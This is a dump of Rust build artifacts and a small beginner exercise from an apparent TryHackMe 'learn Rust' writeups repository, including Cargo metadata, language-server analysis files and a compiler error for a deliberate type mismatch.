-------------------------------------------------------------------------------- 1 | 6ec9f55d3e712293 -------------------------------------------------------------------------------- /room_learn_rust/rust_hello_world/target/rls/debug/.fingerprint/rust_hello_world-6b80a374f8adeb4c/test-bin-rust_hello_world.json: -------------------------------------------------------------------------------- 1 | {"rustc":66165631676752942,"features":"[]","target":10354859241807724074,"profile":8341259748240011191,"path":1036222786711178230,"deps":[],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/rust_hello_world-6b80a374f8adeb4c/dep-test-bin-rust_hello_world"}}],"rustflags":[],"metadata":15837698768319562253,"config":0} -------------------------------------------------------------------------------- /room_learn_rust/rust_hello_world/target/rls/debug/.fingerprint/rust_hello_world-979be69e884e7653/bin-rust_hello_world: -------------------------------------------------------------------------------- 1 | e11891345e697f1b -------------------------------------------------------------------------------- /room_learn_rust/rust_hello_world/target/rls/debug/.fingerprint/rust_hello_world-979be69e884e7653/bin-rust_hello_world.json: -------------------------------------------------------------------------------- 1 | {"rustc":66165631676752942,"features":"[]","target":10354859241807724074,"profile":1613559695681135254,"path":1036222786711178230,"deps":[],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/rust_hello_world-979be69e884e7653/dep-bin-rust_hello_world"}}],"rustflags":[],"metadata":15837698768319562253,"config":0} -------------------------------------------------------------------------------- /room_learn_rust/rust_hello_world/target/rls/debug/.fingerprint/rust_hello_world-979be69e884e7653/dep-bin-rust_hello_world: -------------------------------------------------------------------------------- 1 |  src/main.rs -------------------------------------------------------------------------------- /room_learn_rust/rust_hello_world/target/rls/debug/.fingerprint/rust_hello_world-979be69e884e7653/invoked.timestamp: -------------------------------------------------------------------------------- 1 | This file has an mtime of when this was started. -------------------------------------------------------------------------------- /room_learn_rust/rust_hello_world/target/rls/debug/deps/librust_hello_world-6b80a374f8adeb4c.rmeta: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_learn_rust/rust_hello_world/target/rls/debug/deps/librust_hello_world-6b80a374f8adeb4c.rmeta -------------------------------------------------------------------------------- /room_learn_rust/rust_hello_world/target/rls/debug/deps/librust_hello_world-979be69e884e7653.rmeta: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_learn_rust/rust_hello_world/target/rls/debug/deps/librust_hello_world-979be69e884e7653.rmeta -------------------------------------------------------------------------------- /room_learn_rust/rust_hello_world/target/rls/debug/deps/rust_hello_world-6b80a374f8adeb4c.d: -------------------------------------------------------------------------------- 1 | /root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_hello_world/target/rls/debug/deps/rust_hello_world-6b80a374f8adeb4c.rmeta: src/main.rs 2 | 3 | /root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_hello_world/target/rls/debug/deps/rust_hello_world-6b80a374f8adeb4c.d: src/main.rs 4 | 5 | src/main.rs: 6 | -------------------------------------------------------------------------------- /room_learn_rust/rust_hello_world/target/rls/debug/deps/rust_hello_world-979be69e884e7653.d: -------------------------------------------------------------------------------- 1 | /root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_hello_world/target/rls/debug/deps/rust_hello_world-979be69e884e7653.rmeta: src/main.rs 2 | 3 | /root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_hello_world/target/rls/debug/deps/rust_hello_world-979be69e884e7653.d: src/main.rs 4 | 5 | src/main.rs: 6 | -------------------------------------------------------------------------------- /room_learn_rust/rust_hello_world/target/rls/debug/deps/save-analysis/rust_hello_world-6b80a374f8adeb4c.json: -------------------------------------------------------------------------------- 1 | {"config":{"output_file":null,"full_docs":false,"pub_only":false,"reachable_only":false,"distro_crate":false,"signatures":false,"borrow_data":false},"version":"0.19.0","compilation":{"directory":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_hello_world","program":"/root/.rustup/toolchains/stable-x86_64-unknown-linux-gnu/bin/rls","arguments":[],"output":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_hello_world/target/rls/debug/deps/librust_hello_world-6b80a374f8adeb4c.rmeta"},"prelude":{"crate_id":{"name":"rust_hello_world","disambiguator":[13649890405497041032,5490437594251617874]},"crate_root":"src","external_crates":[{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_hello_world/src/main.rs","num":1,"id":{"name":"std","disambiguator":[7603043973503281951,6245179856538753269]}},{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_hello_world/src/main.rs","num":2,"id":{"name":"core","disambiguator":[13741360846946026623,2672266499591153283]}},{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_hello_world/src/main.rs","num":3,"id":{"name":"compiler_builtins","disambiguator":[4729845745352067521,14981637654352572000]}},{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_hello_world/src/main.rs","num":4,"id":{"name":"rustc_std_workspace_core","disambiguator":[9324331421111590993,11905740212167270908]}},{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_hello_world/src/main.rs","num":5,"id":{"name":"alloc","disambiguator":[11392341838745785002,13287300438441731562]}},{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_hello_world/src/main.rs","num":6,"id":{"name":"libc","disambiguator":[8694337109875809164,2250367951223185901]}},{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_hello_world/src/main.rs","num":7,"id":{"name":"unwind","disambiguator":[10935849247287619708,10935329660555626336]}},{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_hello_world/src/main.rs","num":8,"id":{"name":"cfg_if","disambiguator":[5583458701817410803,1770096645244614441]}},{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_hello_world/src/main.rs","num":9,"id":{"name":"hashbrown","disambiguator":[4926505318506753650,8786990194761766393]}},{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_hello_world/src/main.rs","num":10,"id":{"name":"rustc_std_workspace_alloc","disambiguator":[15262570485262297613,5690312430589388023]}},{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_hello_world/src/main.rs","num":11,"id":{"name":"rustc_demangle","disambiguator":[16900335184017598038,9051488994794742296]}},{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_hello_world/src/main.rs","num":12,"id":{"name":"addr2line","disambiguator":[528960645316233979,8037674519295179684]}},{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_hello_world/src/main.rs","num":13,"id":{"name":"gimli","disambiguator":[4483237274112351560,17959943558012528736]}},{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_hello_world/src/main.rs","num":14,"id":{"name":"object","disambiguator":[384772052184402859,1578385820564656749]}},{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_hello_world/src/main.rs","num":15,"id":{"name":"miniz_oxide","disambiguator":[12301751291607961788,16569514459755551136]}},{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_hello_world/src/main.rs","num":16,"id":{"name":"adler","disambiguator":[4223616801544016660,17489963460572122123]}},{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_hello_world/src/main.rs","num":17,"id":{"name":"panic_unwind","disambiguator":[3882963855561891520,1067502799155491607]}},{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_hello_world/src/main.rs","num":18,"id":{"name":"test","disambiguator":[9572024626595067425,8312024196499578521]}},{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_hello_world/src/main.rs","num":19,"id":{"name":"getopts","disambiguator":[8111114801448671770,14749389349530965455]}},{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_hello_world/src/main.rs","num":20,"id":{"name":"rustc_std_workspace_std","disambiguator":[3996038855337418846,6971255853916042439]}},{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_hello_world/src/main.rs","num":21,"id":{"name":"unicode_width","disambiguator":[17311524211788283371,3124921599973161970]}},{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_hello_world/src/main.rs","num":22,"id":{"name":"term","disambiguator":[1695108877515168134,11816474249092423311]}}],"span":{"file_name":"src/main.rs","byte_start":0,"byte_end":44,"line_start":1,"line_end":3,"column_start":1,"column_end":2}},"imports":[],"defs":[{"kind":"Mod","id":{"krate":0,"index":0},"span":{"file_name":"src/main.rs","byte_start":0,"byte_end":44,"line_start":1,"line_end":3,"column_start":1,"column_end":2},"name":"","qualname":"::","value":"src/main.rs","parent":null,"children":[{"krate":0,"index":1},{"krate":0,"index":2},{"krate":0,"index":3},{"krate":0,"index":4}],"decl_id":null,"docs":"","sig":null,"attributes":[]},{"kind":"Function","id":{"krate":0,"index":3},"span":{"file_name":"src/main.rs","byte_start":3,"byte_end":7,"line_start":1,"line_end":1,"column_start":4,"column_end":8},"name":"main","qualname":"::main","value":"fn main()","parent":null,"children":[],"decl_id":null,"docs":"","sig":null,"attributes":[{"value":"allow(dead_code)","span":{"file_name":"src/main.rs","byte_start":0,"byte_end":0,"line_start":1,"line_end":1,"column_start":1,"column_end":1}}]}],"impls":[],"refs":[{"kind":"Function","span":{"file_name":"/root/.rustup/toolchains/stable-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/std/src/macros.rs","byte_start":23357,"byte_end":23390,"line_start":96,"line_end":96,"column_start":28,"column_end":61},"ref_id":{"krate":2,"index":6304}}],"macro_refs":[],"relations":[]} -------------------------------------------------------------------------------- /room_learn_rust/rust_hello_world/target/rls/debug/deps/save-analysis/rust_hello_world-979be69e884e7653.json: -------------------------------------------------------------------------------- 1 | {"config":{"output_file":null,"full_docs":false,"pub_only":false,"reachable_only":false,"distro_crate":false,"signatures":false,"borrow_data":false},"version":"0.19.0","compilation":{"directory":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_hello_world","program":"/root/.rustup/toolchains/stable-x86_64-unknown-linux-gnu/bin/rls","arguments":[],"output":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_hello_world/target/rls/debug/deps/librust_hello_world-979be69e884e7653.rmeta"},"prelude":{"crate_id":{"name":"rust_hello_world","disambiguator":[5774938289493903520,363110199219295376]},"crate_root":"src","external_crates":[{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_hello_world/src/main.rs","num":1,"id":{"name":"std","disambiguator":[7603043973503281951,6245179856538753269]}},{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_hello_world/src/main.rs","num":2,"id":{"name":"core","disambiguator":[13741360846946026623,2672266499591153283]}},{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_hello_world/src/main.rs","num":3,"id":{"name":"compiler_builtins","disambiguator":[4729845745352067521,14981637654352572000]}},{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_hello_world/src/main.rs","num":4,"id":{"name":"rustc_std_workspace_core","disambiguator":[9324331421111590993,11905740212167270908]}},{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_hello_world/src/main.rs","num":5,"id":{"name":"alloc","disambiguator":[11392341838745785002,13287300438441731562]}},{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_hello_world/src/main.rs","num":6,"id":{"name":"libc","disambiguator":[8694337109875809164,2250367951223185901]}},{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_hello_world/src/main.rs","num":7,"id":{"name":"unwind","disambiguator":[10935849247287619708,10935329660555626336]}},{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_hello_world/src/main.rs","num":8,"id":{"name":"cfg_if","disambiguator":[5583458701817410803,1770096645244614441]}},{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_hello_world/src/main.rs","num":9,"id":{"name":"hashbrown","disambiguator":[4926505318506753650,8786990194761766393]}},{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_hello_world/src/main.rs","num":10,"id":{"name":"rustc_std_workspace_alloc","disambiguator":[15262570485262297613,5690312430589388023]}},{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_hello_world/src/main.rs","num":11,"id":{"name":"rustc_demangle","disambiguator":[16900335184017598038,9051488994794742296]}},{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_hello_world/src/main.rs","num":12,"id":{"name":"addr2line","disambiguator":[528960645316233979,8037674519295179684]}},{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_hello_world/src/main.rs","num":13,"id":{"name":"gimli","disambiguator":[4483237274112351560,17959943558012528736]}},{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_hello_world/src/main.rs","num":14,"id":{"name":"object","disambiguator":[384772052184402859,1578385820564656749]}},{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_hello_world/src/main.rs","num":15,"id":{"name":"miniz_oxide","disambiguator":[12301751291607961788,16569514459755551136]}},{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_hello_world/src/main.rs","num":16,"id":{"name":"adler","disambiguator":[4223616801544016660,17489963460572122123]}},{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_hello_world/src/main.rs","num":17,"id":{"name":"panic_unwind","disambiguator":[3882963855561891520,1067502799155491607]}}],"span":{"file_name":"src/main.rs","byte_start":0,"byte_end":44,"line_start":1,"line_end":3,"column_start":1,"column_end":2}},"imports":[],"defs":[{"kind":"Mod","id":{"krate":0,"index":0},"span":{"file_name":"src/main.rs","byte_start":0,"byte_end":44,"line_start":1,"line_end":3,"column_start":1,"column_end":2},"name":"","qualname":"::","value":"src/main.rs","parent":null,"children":[{"krate":0,"index":1},{"krate":0,"index":2},{"krate":0,"index":3}],"decl_id":null,"docs":"","sig":null,"attributes":[]},{"kind":"Function","id":{"krate":0,"index":3},"span":{"file_name":"src/main.rs","byte_start":3,"byte_end":7,"line_start":1,"line_end":1,"column_start":4,"column_end":8},"name":"main","qualname":"::main","value":"fn main()","parent":null,"children":[],"decl_id":null,"docs":"","sig":null,"attributes":[]}],"impls":[],"refs":[{"kind":"Function","span":{"file_name":"/root/.rustup/toolchains/stable-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/std/src/macros.rs","byte_start":23357,"byte_end":23390,"line_start":96,"line_end":96,"column_start":28,"column_end":61},"ref_id":{"krate":2,"index":6304}}],"macro_refs":[],"relations":[]} -------------------------------------------------------------------------------- /room_learn_rust/rust_hello_world/target/rls/debug/incremental/rust_hello_world-17vicrtislj8g/s-fspr2zw78u-1sirg0z-19bedwzhfs7wl/dep-graph.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_learn_rust/rust_hello_world/target/rls/debug/incremental/rust_hello_world-17vicrtislj8g/s-fspr2zw78u-1sirg0z-19bedwzhfs7wl/dep-graph.bin -------------------------------------------------------------------------------- /room_learn_rust/rust_hello_world/target/rls/debug/incremental/rust_hello_world-17vicrtislj8g/s-fspr2zw78u-1sirg0z-19bedwzhfs7wl/query-cache.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_learn_rust/rust_hello_world/target/rls/debug/incremental/rust_hello_world-17vicrtislj8g/s-fspr2zw78u-1sirg0z-19bedwzhfs7wl/query-cache.bin -------------------------------------------------------------------------------- /room_learn_rust/rust_hello_world/target/rls/debug/incremental/rust_hello_world-17vicrtislj8g/s-fspr2zw78u-1sirg0z-19bedwzhfs7wl/work-products.bin: -------------------------------------------------------------------------------- 1 | RSIC1.47.0 (18bf6b4f0 2020-10-07) -------------------------------------------------------------------------------- /room_learn_rust/rust_hello_world/target/rls/debug/incremental/rust_hello_world-17vicrtislj8g/s-fspr2zw78u-1sirg0z.lock: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_learn_rust/rust_hello_world/target/rls/debug/incremental/rust_hello_world-17vicrtislj8g/s-fspr2zw78u-1sirg0z.lock -------------------------------------------------------------------------------- /room_learn_rust/rust_hello_world/target/rls/debug/incremental/rust_hello_world-2vpeabgnekkug/s-fspr2zy3hq-1dca8lx-3u55tx7hlx4th/dep-graph.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_learn_rust/rust_hello_world/target/rls/debug/incremental/rust_hello_world-2vpeabgnekkug/s-fspr2zy3hq-1dca8lx-3u55tx7hlx4th/dep-graph.bin -------------------------------------------------------------------------------- /room_learn_rust/rust_hello_world/target/rls/debug/incremental/rust_hello_world-2vpeabgnekkug/s-fspr2zy3hq-1dca8lx-3u55tx7hlx4th/query-cache.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_learn_rust/rust_hello_world/target/rls/debug/incremental/rust_hello_world-2vpeabgnekkug/s-fspr2zy3hq-1dca8lx-3u55tx7hlx4th/query-cache.bin -------------------------------------------------------------------------------- /room_learn_rust/rust_hello_world/target/rls/debug/incremental/rust_hello_world-2vpeabgnekkug/s-fspr2zy3hq-1dca8lx-3u55tx7hlx4th/work-products.bin: -------------------------------------------------------------------------------- 1 | RSIC1.47.0 (18bf6b4f0 2020-10-07) -------------------------------------------------------------------------------- /room_learn_rust/rust_hello_world/target/rls/debug/incremental/rust_hello_world-2vpeabgnekkug/s-fspr2zy3hq-1dca8lx.lock: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_learn_rust/rust_hello_world/target/rls/debug/incremental/rust_hello_world-2vpeabgnekkug/s-fspr2zy3hq-1dca8lx.lock -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_1/Cargo.lock: -------------------------------------------------------------------------------- 1 | # This file is automatically @generated by Cargo. 2 | # It is not intended for manual editing. 3 | [[package]] 4 | name = "rust_task_4_question_1" 5 | version = "0.1.0" 6 | -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_1/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "rust_task_4_question_1" 3 | version = "0.1.0" 4 | authors = ["Pamela Hrituc "] 5 | edition = "2018" 6 | 7 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 8 | 9 | [dependencies] 10 | -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_1/src/main.rs: -------------------------------------------------------------------------------- 1 | fn main() { 2 | let x = 5; 3 | println!("The value of x is: {}", x); 4 | x = "hello"; 5 | println!("The value of x is: {}", x); 6 | } 7 | -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_1/target/.rustc_info.json: -------------------------------------------------------------------------------- 1 | {"rustc_fingerprint":1271388184313950870,"outputs":{"1164083562126845933":["rustc 1.47.0 (18bf6b4f0 2020-10-07)\nbinary: rustc\ncommit-hash: 18bf6b4f01a6feaf7259ba7cdae58031af1b7b39\ncommit-date: 2020-10-07\nhost: x86_64-unknown-linux-gnu\nrelease: 1.47.0\nLLVM version: 11.0\n",""],"4476964694761187371":["___\nlib___.rlib\nlib___.so\nlib___.so\nlib___.a\nlib___.so\n/root/.rustup/toolchains/stable-x86_64-unknown-linux-gnu\ndebug_assertions\nproc_macro\ntarget_arch=\"x86_64\"\ntarget_endian=\"little\"\ntarget_env=\"gnu\"\ntarget_family=\"unix\"\ntarget_feature=\"fxsr\"\ntarget_feature=\"sse\"\ntarget_feature=\"sse2\"\ntarget_os=\"linux\"\ntarget_pointer_width=\"64\"\ntarget_vendor=\"unknown\"\nunix\n",""]},"successes":{}} -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_1/target/debug/.cargo-lock: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_learn_rust/rust_task_4_question_1/target/debug/.cargo-lock -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_1/target/debug/.fingerprint/rust_task_4_question_1-3efc02927c418b19/invoked.timestamp: -------------------------------------------------------------------------------- 1 | This file has an mtime of when this was started. -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_1/target/debug/.fingerprint/rust_task_4_question_1-3efc02927c418b19/output-bin-rust_task_4_question_1: -------------------------------------------------------------------------------- 1 | {"message":"mismatched types","code":{"code":"E0308","explanation":"Expected type did not match the received type.\n\nErroneous code example:\n\n```compile_fail,E0308\nlet x: i32 = \"I am not a number!\";\n// ~~~ ~~~~~~~~~~~~~~~~~~~~\n// | |\n// | initializing expression;\n// | compiler infers type `&str`\n// |\n// type `i32` assigned to variable `x`\n```\n\nThis error occurs when the compiler is unable to infer the concrete type of a\nvariable. It can occur in several cases, the most common being a mismatch\nbetween two types: the type the author explicitly assigned, and the type the\ncompiler inferred.\n"},"level":"error","spans":[{"file_name":"src/main.rs","byte_start":77,"byte_end":84,"line_start":4,"line_end":4,"column_start":9,"column_end":16,"is_primary":true,"text":[{"text":" x = \"hello\";","highlight_start":9,"highlight_end":16}],"label":"expected integer, found `&str`","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0308]\u001b[0m\u001b[0m\u001b[1m: mismatched types\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/main.rs:4:9\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m4\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m| \u001b[0m\u001b[0m x = \"hello\";\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m| \u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^^^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9mexpected integer, found `&str`\u001b[0m\n\n"} 2 | {"message":"aborting due to previous error","code":null,"level":"error","spans":[],"children":[],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror\u001b[0m\u001b[0m\u001b[1m: aborting due to previous error\u001b[0m\n\n"} 3 | {"message":"For more information about this error, try `rustc --explain E0308`.","code":null,"level":"failure-note","spans":[],"children":[],"rendered":"\u001b[0m\u001b[1mFor more information about this error, try `rustc --explain E0308`.\u001b[0m\n"} 4 | -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_1/target/debug/deps/rust_task_4_question_1-3efc02927c418b19.d: -------------------------------------------------------------------------------- 1 | /root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_task_4_question_1/target/debug/deps/rust_task_4_question_1-3efc02927c418b19: src/main.rs 2 | 3 | /root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_task_4_question_1/target/debug/deps/rust_task_4_question_1-3efc02927c418b19.d: src/main.rs 4 | 5 | src/main.rs: 6 | -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_1/target/debug/incremental/rust_task_4_question_1-z52mlhbyfh5c/s-fspso4i3ny-1kyr4xk.lock: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_learn_rust/rust_task_4_question_1/target/debug/incremental/rust_task_4_question_1-z52mlhbyfh5c/s-fspso4i3ny-1kyr4xk.lock -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_1/target/rls/.rustc_info.json: -------------------------------------------------------------------------------- 1 | {"rustc_fingerprint":1271388184313950870,"outputs":{"4476964694761187371":["___\nlib___.rlib\nlib___.so\nlib___.so\nlib___.a\nlib___.so\n/root/.rustup/toolchains/stable-x86_64-unknown-linux-gnu\ndebug_assertions\nproc_macro\ntarget_arch=\"x86_64\"\ntarget_endian=\"little\"\ntarget_env=\"gnu\"\ntarget_family=\"unix\"\ntarget_feature=\"fxsr\"\ntarget_feature=\"sse\"\ntarget_feature=\"sse2\"\ntarget_os=\"linux\"\ntarget_pointer_width=\"64\"\ntarget_vendor=\"unknown\"\nunix\n",""],"1164083562126845933":["rustc 1.47.0 (18bf6b4f0 2020-10-07)\nbinary: rustc\ncommit-hash: 18bf6b4f01a6feaf7259ba7cdae58031af1b7b39\ncommit-date: 2020-10-07\nhost: x86_64-unknown-linux-gnu\nrelease: 1.47.0\nLLVM version: 11.0\n",""]},"successes":{}} -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_1/target/rls/CACHEDIR.TAG: -------------------------------------------------------------------------------- 1 | Signature: 8a477f597d28d172789f06886806bc55 2 | # This file is a cache directory tag created by cargo. 3 | # For information about cache directory tags see https://bford.info/cachedir/ -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_1/target/rls/debug/.cargo-lock: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_learn_rust/rust_task_4_question_1/target/rls/debug/.cargo-lock -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_1/target/rls/debug/.fingerprint/rust_task_4_question_1-4fafdb15f7b8372a/dep-test-bin-rust_task_4_question_1: -------------------------------------------------------------------------------- 1 |  src/main.rs -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_1/target/rls/debug/.fingerprint/rust_task_4_question_1-4fafdb15f7b8372a/invoked.timestamp: -------------------------------------------------------------------------------- 1 | This file has an mtime of when this was started. -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_1/target/rls/debug/.fingerprint/rust_task_4_question_1-4fafdb15f7b8372a/test-bin-rust_task_4_question_1: -------------------------------------------------------------------------------- 1 | 1b7c70ad496d51e5 -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_1/target/rls/debug/.fingerprint/rust_task_4_question_1-4fafdb15f7b8372a/test-bin-rust_task_4_question_1.json: -------------------------------------------------------------------------------- 1 | {"rustc":66165631676752942,"features":"[]","target":4878065714746176386,"profile":8341259748240011191,"path":1036222786711178230,"deps":[],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/rust_task_4_question_1-4fafdb15f7b8372a/dep-test-bin-rust_task_4_question_1"}}],"rustflags":[],"metadata":15837698768319562253,"config":0} -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_1/target/rls/debug/.fingerprint/rust_task_4_question_1-62f166f2afadf485/bin-rust_task_4_question_1: -------------------------------------------------------------------------------- 1 | 0c0975ffe456df3c -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_1/target/rls/debug/.fingerprint/rust_task_4_question_1-62f166f2afadf485/bin-rust_task_4_question_1.json: -------------------------------------------------------------------------------- 1 | {"rustc":66165631676752942,"features":"[]","target":4878065714746176386,"profile":1613559695681135254,"path":1036222786711178230,"deps":[],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/rust_task_4_question_1-62f166f2afadf485/dep-bin-rust_task_4_question_1"}}],"rustflags":[],"metadata":15837698768319562253,"config":0} -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_1/target/rls/debug/.fingerprint/rust_task_4_question_1-62f166f2afadf485/dep-bin-rust_task_4_question_1: -------------------------------------------------------------------------------- 1 |  src/main.rs -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_1/target/rls/debug/.fingerprint/rust_task_4_question_1-62f166f2afadf485/invoked.timestamp: -------------------------------------------------------------------------------- 1 | This file has an mtime of when this was started. -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_1/target/rls/debug/deps/librust_task_4_question_1-4fafdb15f7b8372a.rmeta: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_learn_rust/rust_task_4_question_1/target/rls/debug/deps/librust_task_4_question_1-4fafdb15f7b8372a.rmeta -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_1/target/rls/debug/deps/librust_task_4_question_1-62f166f2afadf485.rmeta: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_learn_rust/rust_task_4_question_1/target/rls/debug/deps/librust_task_4_question_1-62f166f2afadf485.rmeta -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_1/target/rls/debug/deps/rust_task_4_question_1-4fafdb15f7b8372a.d: -------------------------------------------------------------------------------- 1 | /root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_task_4_question_1/target/rls/debug/deps/rust_task_4_question_1-4fafdb15f7b8372a.rmeta: src/main.rs 2 | 3 | /root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_task_4_question_1/target/rls/debug/deps/rust_task_4_question_1-4fafdb15f7b8372a.d: src/main.rs 4 | 5 | src/main.rs: 6 | -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_1/target/rls/debug/deps/rust_task_4_question_1-62f166f2afadf485.d: 